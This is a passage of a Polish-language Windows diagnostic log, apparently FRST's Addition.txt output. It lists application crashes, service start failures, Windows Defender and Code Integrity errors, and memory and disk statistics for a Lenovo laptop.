0xc0000005 Przesunięcie błędu: 0x00193a73 Identyfikator procesu powodującego błąd: 0x7d0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d69ecf04bc2ce1 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe Ścieżka modułu powodującego błąd: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe Identyfikator raportu: 2f22d690-0af5-11eb-8977-fcf8ae9b2e3a Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (10/08/2020 10:22:47 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: chrome.exe, wersja: 85.0.4183.121, sygnatura czasowa: 0x5f654c60 Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 6.3.9600.19724, sygnatura czasowa: 0x5ec5262a Kod wyjątku: 0xe0000008 Przesunięcie błędu: 0x0000000000007afc Identyfikator procesu powodującego błąd: 0x1ef0 Godzina uruchomienia 
aplikacji powodującej błąd: 0x01d69d3cfe75e062 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Ścieżka modułu powodującego błąd: C:\Windows\system32\KERNELBASE.dll Identyfikator raportu: 691cfab0-09ac-11eb-8975-fcf8ae9b2e3a Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (10/07/2020 06:49:09 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: PSUAConsole.exe, wersja: 20.0.0.0, sygnatura czasowa: 0x5da94175 Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 6.3.9600.19724, sygnatura czasowa: 0x5ec50c3e Kod wyjątku: 0xe0434352 Przesunięcie błędu: 0x000156e8 Identyfikator procesu powodującego błąd: 0x2638 Godzina uruchomienia aplikacji powodującej błąd: 0x01d69cd21a817aab Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAConsole.exe Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\KERNELBASE.dll Identyfikator raportu: 669a3f28-08c5-11eb-8974-fcf8ae9b2e3a Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (10/07/2020 06:49:05 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Aplikacja: PSUAConsole.exe Wersja architektury: v4.0.30319 Opis: proces został przerwany z powodu nieobsłużonego wyjątku. 
Informacje o wyjątku: System.NullReferenceException w PSUAConsole.ViewModel.Alerts.AlertCampaignsViewModel.CloseAction(CLOSE_TYPE, UInt32 ByRef) w PSUAConsole.ViewModel.Alerts.AlertsGenericViewModel.InternalCloseAction(CLOSE_TYPE, UInt32) w PSUAConsole.ViewModel.Alerts.AlertsGenericViewModel.InternalCloseByUserAction() Informacje o wyjątku: System.Reflection.TargetInvocationException w System.RuntimeMethodHandle.InvokeMethod(System.Object, System.Object[], System.Signature, Boolean) w System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(System.Object, System.Object[], System.Object[]) w System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo) w GalaSoft.MvvmLight.Helpers.WeakAction.Execute() w GalaSoft.MvvmLight.Command.RelayCommand.Execute(System.Object) w MS.Internal.Commands.CommandHelpers.CriticalExecuteCommandSource(System.Windows.Input.ICommandSource, Boolean) w System.Windows.Controls.Primitives.ButtonBase.OnClick() w System.Windows.Controls.Button.OnClick() w System.Windows.Controls.Primitives.ButtonBase.OnMouseLeftButtonUp(System.Windows.Input.MouseButtonEventArgs) w System.Windows.UIElement.OnMouseLeftButtonUpThunk(System.Object, System.Windows.Input.MouseButtonEventArgs) w System.Windows.Input.MouseButtonEventArgs.InvokeEventHandler(System.Delegate, System.Object) w System.Windows.RoutedEventArgs.InvokeHandler(System.Delegate, System.Object) w System.Windows.RoutedEventHandlerInfo.InvokeHandler(System.Object, System.Windows.RoutedEventArgs) w System.Windows.EventRoute.InvokeHandlersImpl(System.Object, System.Windows.RoutedEventArgs, Boolean) w System.Windows.UIElement.ReRaiseEventAs(System.Windows.DependencyObject, System.Windows.RoutedEventArgs, System.Windows.RoutedEvent) w System.Windows.UIElement.OnMouseUpThunk(System.Object, System.Windows.Input.MouseButtonEventArgs) w 
System.Windows.Input.MouseButtonEventArgs.InvokeEventHandler(System.Delegate, System.Object) w System.Windows.RoutedEventArgs.InvokeHandler(System.Delegate, System.Object) w System.Windows.RoutedEventHandlerInfo.InvokeHandler(System.Object, System.Windows.RoutedEventArgs) w System.Windows.EventRoute.InvokeHandlersImpl(System.Object, System.Windows.RoutedEventArgs, Boolean) w System.Windows.UIElement.RaiseEventImpl(System.Windows.DependencyObject, System.Windows.RoutedEventArgs) w System.Windows.UIElement.RaiseTrustedEvent(System.Windows.RoutedEventArgs) w System.Windows.UIElement.RaiseEvent(System.Windows.RoutedEventArgs, Boolean) w System.Windows.Input.InputManager.ProcessStagingArea() w System.Windows.Input.InputManager.ProcessInput(System.Windows.Input.InputEventArgs) w System.Windows.Input.InputProviderSite.ReportInput(System.Windows.Input.InputReport) w System.Windows.Interop.HwndMouseInputProvider.ReportInput(IntPtr, System.Windows.Input.InputMode, Int32, System.Windows.Input.RawMouseActions, Int32, Int32, Int32) w System.Windows.Interop.HwndMouseInputProvider.FilterMessage(IntPtr, MS.Internal.Interop.WindowMessage, IntPtr, IntPtr, Boolean ByRef) w System.Windows.Interop.HwndSource.InputFilterMessage(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) w MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) w MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) w System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) w System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) w System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) w MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) w MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) w 
System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) w System.Windows.Threading.Dispatcher.PushFrame(System.Windows.Threading.DispatcherFrame) w System.Windows.Window.ShowHelper(System.Object) w System.Windows.Window.Show() w System.Windows.Window.ShowDialog() w PandaConsole.App.OnStartup(System.Windows.StartupEventArgs) w System.Windows.Application.<.ctor>b__1_0(System.Object) w System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) w System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) w System.Windows.Threading.DispatcherOperation.InvokeImpl() w System.Windows.Threading.DispatcherOperation.InvokeInSecurityContext(System.Object) w System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) w MS.Internal.CulturePreservingExecutionContext.Run(MS.Internal.CulturePreservingExecutionContext, System.Threading.ContextCallback, System.Object) w System.Windows.Threading.DispatcherOperation.Invoke() w System.Windows.Threading.Dispatcher.ProcessQueue() w System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) w MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) w MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) w System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) w System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) w 
System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) w MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) w MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) w System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) w System.Windows.Threading.Dispatcher.PushFrame(System.Windows.Threading.DispatcherFrame) w System.Windows.Application.RunDispatcher(System.Object) w System.Windows.Application.RunInternal(System.Windows.Window) w System.Windows.Application.Run(System.Windows.Window) w System.Windows.Application.Run() w PandaConsole.App.Main() Error: (10/06/2020 07:12:08 PM) (Source: NvStreamSvc) (EventID: 1) (User: ) Description: Event-ID 1 Dziennik System: ============= Error: (01/17/2021 09:18:34 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa CSHMDR niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (01/17/2021 09:04:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi ComputerZLock z powodu następującego błędu: System nie może odnaleźć określonej ścieżki. Error: (01/17/2021 09:00:48 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Update Mgr RollAround z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (01/17/2021 09:00:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi ComputerZLock z powodu następującego błędu: System nie może odnaleźć określonej ścieżki. Error: (01/17/2021 09:00:37 AM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 413) (User: ZARZĄDZANIE NT) Description: Usługa Harmonogram zadań nie może załadować zadań podczas uruchamiania usługi. Dane dodatkowe: Wartość błędu: 2147942402. 
Error: (01/17/2021 09:00:37 AM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 413) (User: ZARZĄDZANIE NT) Description: Usługa Harmonogram zadań nie może załadować zadań podczas uruchamiania usługi. Dane dodatkowe: Wartość błędu: 2147942402. Error: (01/17/2021 09:00:37 AM) (Source: Microsoft-Windows-TaskScheduler) (EventID: 412) (User: ZARZĄDZANIE NT) Description: Usługa Harmonogram zadań nie może uruchomić zadań wyzwalanych podczas uruchamiania komputera. Dodatkowe dane: Wartość błędu: 2147942402. Error: (01/17/2021 09:00:28 AM) (Source: Service Control Manager) (EventID: 7003) (User: ) Description: Usługa Kompozycje zależy od następującej usługi: iThemes5. Ta usługa może nie być zainstalowana. Windows Defender: =================================== Date: 2017-02-12 13:51:12.066 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {B1FB9A1E-3DEE-4C27-BB1C-83DF586DD721} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2017-02-11 20:48:26.505 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {B9601693-179B-4C75-8526-B5ADD64E0854} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2017-02-11 20:43:18.313 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {39CD8E46-65D3-4E50-B4B6-CEB4867DDA8B} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2017-02-11 20:18:12.299 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. 
Identyfikator skanowania: {0175DCCC-757D-4EAD-8EA0-206E80993053} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2017-02-11 14:50:45.398 Description: Skanowanie produktu Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {F6D29E80-CF5C-432A-9931-5278D78DC706} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2020-09-02 17:26:30.595 Description: Produkt Windows Defender napotkał błąd podczas próby załadowania podpisów i podejmie próbę powrotu do znanego zestawu dobrych podpisów. Podpisy objęte próbą: Bieżące Kod błędu: 0x80070002 Opis błędu: Nie można odnaleźć określonego pliku. Wersja podpisu: 0.0.0.0;0.0.0.0 Wersja aparatu: 0.0.0.0 Date: 2017-02-22 15:24:22.659 Description: Działanie aparatu Windows Defender zostało zakończone z powodu nieoczekiwanego błędu. Typ błędu: Awaria Kod wyjątku: 0x80000003 Zasób: Date: 2017-02-22 15:24:22.552 Description: Działanie aparatu Windows Defender zostało zakończone z powodu nieoczekiwanego błędu. Typ błędu: Awaria Kod wyjątku: 0xc000000d Zasób: Date: 2017-02-21 15:15:48.037 Description: Agent ochrony w czasie rzeczywistym produktu Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: System inspekcji sieci Kod błędu: 0x80070003 Opis błędu: System nie może odnaleźć określonej ścieżki. Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2017-02-21 15:00:06.271 Description: Agent ochrony w czasie rzeczywistym produktu Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: System inspekcji sieci Kod błędu: 0x80070003 Opis błędu: System nie może odnaleźć określonej ścieżki. 
Przyczyna: W systemie brakuje aktualizacji wymaganych do uruchomienia systemu inspekcji sieci. Zainstaluj wymagane aktualizacje i ponownie uruchom komputer. CodeIntegrity: =================================== Date: 2017-02-12 12:26:07.107 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-11 11:24:57.495 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-05 12:47:43.195 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-04 11:31:36.985 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-01-28 11:55:24.192 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. 
Date: 2017-01-22 19:20:55.956
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-01-15 18:23:34.580
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-01-08 11:51:57.117
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Statystyki pamięci ===========================

BIOS: LENOVO 7FCN35WW 09/02/2013
Płyta główna: LENOVO Durian 7A1
Procesor: Intel(R) Core(TM) i5-4200M CPU @ 2.50GHz
Procent pamięci w użyciu: 82%
Całkowita pamięć fizyczna: 4008.27 MB
Dostępna pamięć fizyczna: 693.07 MB
Całkowita pamięć wirtualna: 7208.27 MB
Dostępna pamięć wirtualna: 1349.38 MB

==================== Dyski ================================

Drive c: (Windows) (Fixed) (Total:100 GB) (Free:4.92 GB) NTFS
Drive d: (DATA) (Fixed) (Total:831.04 GB) (Free:830.83 GB) NTFS

==================== MBR & Tablica partycji ====================

==========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: A36C4F46)

Partition: GPT.

==================== Koniec Addition.txt =======================